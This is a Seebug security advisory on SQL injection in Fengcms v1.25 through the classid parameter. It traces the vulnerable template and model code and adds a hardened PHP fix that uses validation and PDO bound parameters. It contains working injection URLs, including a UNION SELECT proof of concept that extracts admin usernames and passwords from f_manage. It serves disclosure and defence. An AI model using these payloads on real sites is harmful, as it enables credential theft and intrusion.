Fengcms v1.25 SQL Injection Vulnerability

2014-08-12T00:00:00
ID SSV:95455
Type seebug
Reporter Root
Modified 2014-08-12T00:00:00

Description

Brief description:

Filtering is insufficient; it can be bypassed to inject SQL.

Details:

In Template/article.html and Template/article_class.html: {$classid=$_GET['classid']} // taken directly from GET

<div class="home_box">
  <div class="boxtitle">
    <h3>最新推荐</h3>
  </div>
  <ul class="list_12">
    {loop M("module")->l("article","w[classid='$classid'&&attrib_j=1&&status=1];f[title,html,date];n[10];s[id,1]") $k $v}  // classid goes straight into the query
    <li><span>{date('m/d',strtotime($v['date']))}</span><a href="{url($v['html'])}">{$v['title']}</a></li>
    {/loop}
  </ul>
</div>

The code further down is the same and is omitted here.

There is clearly injection potential here; it comes down to whether the query that follows filters anything. Try error-based injection directly (the `*` characters were lost in extraction and are restored from the error message below):

http://localhost/?controller=classify&project=article&classify=&classid=1'%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)#

[Screenshot: QQ截图20140811101536.png, https://images.seebug.org/upload/201408/111016237019335eecabf8ab07d01de400be9588.png]

Message :Invalid SQL:select title,html,date from f_article where classid='1' and (select 1 from (select count(*) and (classid = "concat(version()") order by id desc limit 10

It actually got turned into `and (classid = "concat(version()")`. What on earth? Still, this already reveals the table prefix f_. Let's keep following to see what happened. Locate the function l in model/moduleModel.php:

public function l($table,$func=""){
    $array=explode(";",$func);   // the rule string is split into w[...];f[...];n[...];s[...] parts
    if(count($array)>1){
        foreach($array as $v){
            $this->tagsresolve($v);
        }
    }else{
        $this->tagsresolve($func);
    }
    // ....
    return D($table)->field($field)->where($where)->sort($sortf,$sorts,$sortp)->limit($limit)->getall();
}

The tagsresolve function processes the parameters it is handed, so follow tagsresolve next:

private function tagsresolve($string){
    $str=substr(substr($string,2),0,-1);   // strip the leading "x[" and trailing "]"
    switch(substr($string,0,1)){
        case "w": // the "w" (where) case
            $exp=explode(',',$str);           // split on commas here
            if($exp[1]){                      // if our statement contains a comma, it gets mangled here
                return $this->op['where']=$exp[0].$this->whereclass($exp[1]);
            }elseif($str){
                return $this->op['where']=$str;
            }
            break;
        // ....
    }
}

We will not follow whereclass any further. Since the part after a comma gets cut off, simply avoid commas; see the proof.

Proof of concept:

http://localhost/?controller=classify&project=article&classify=&classid=2'%20%20UNION%20SELECT%20*%20FROM%20((SELECT%20admin%20from%20f_manage)a%20JOIN%20(SELECT%202)b%20JOIN%20(SELECT%20password%20from%20f_manage)c)%20%23

[Screenshot: QQ截图20140811092820.png, https://images.seebug.org/upload/201408/1110271942695d828d9fc98f0d2129b376d31c9c.png]
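The root cause in the template above is that $_GET['classid'] is dropped straight into the text of a where clause, so a single quote ends the literal and everything after it becomes SQL. The block below is an added illustration, not Fengcms code: it places the unsafe string construction next to a hardened version that validates classid as the integer key it is supposed to be and binds it through PDO instead of interpolating it. Table and column names are taken from the error message on the page (f_article with title, html, date, classid, attrib_j, status, id); the in-memory SQLite database, the function names and the sample rows are constructed for the demonstration.

```php
<?php
// Added example (not Fengcms code). Shows the vulnerable where-clause
// construction beside a hardened equivalent.

// Unsafe: mirrors the template's behaviour. A quote in $classid ends the
// literal and whatever follows is interpreted as SQL.
function buildWhereUnsafe(string $classid): string
{
    return "classid='$classid' and attrib_j=1 and status=1";
}

// Hardened step 1: accept only a plain positive integer. classid is a numeric
// foreign key, so no other shape is legitimate; reject rather than "clean".
function parseClassId(string $raw): ?int
{
    if (!preg_match('/^[1-9][0-9]{0,9}$/', $raw)) {
        return null;
    }
    return (int) $raw;
}

// Hardened step 2: the value never becomes part of the SQL text; PDO sends it
// as a typed bound parameter.
function fetchRecommended(PDO $pdo, string $rawClassId, int $limit = 10): array
{
    $classid = parseClassId($rawClassId);
    if ($classid === null) {
        return []; // or answer HTTP 400; never fall back to the raw string
    }
    $sql = 'SELECT title, html, date FROM f_article
            WHERE classid = :classid AND attrib_j = 1 AND status = 1
            ORDER BY id DESC LIMIT :lim';
    $stmt = $pdo->prepare($sql);
    $stmt->bindValue(':classid', $classid, PDO::PARAM_INT);
    $stmt->bindValue(':lim', $limit, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Demonstration on constructed data. An in-memory SQLite database stands in
// for the MySQL server the site would use.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE f_article (id INTEGER PRIMARY KEY, classid INTEGER,
            attrib_j INTEGER, status INTEGER, title TEXT, html TEXT, date TEXT)');
$pdo->exec("INSERT INTO f_article (classid, attrib_j, status, title, html, date)
            VALUES (1, 1, 1, 'Hello', 'hello.html', '2014-08-11'),
                   (2, 1, 0, 'Draft', 'draft.html', '2014-08-12')");

$hostile = "1' or '1'='1";                 // constructed quote-breaking input
echo buildWhereUnsafe($hostile), "\n";     // the quote terminates the literal
var_dump(parseClassId($hostile));          // NULL: rejected before any SQL exists
print_r(fetchRecommended($pdo, '1'));      // normal request: one row
print_r(fetchRecommended($pdo, $hostile)); // empty array, no query executed
```

The check in parseClassId belongs in the controller or model, not the template: templates are exactly where this project let request data reach the query, so the fix should move the decision about what a valid classid looks like to a single place that every caller passes through.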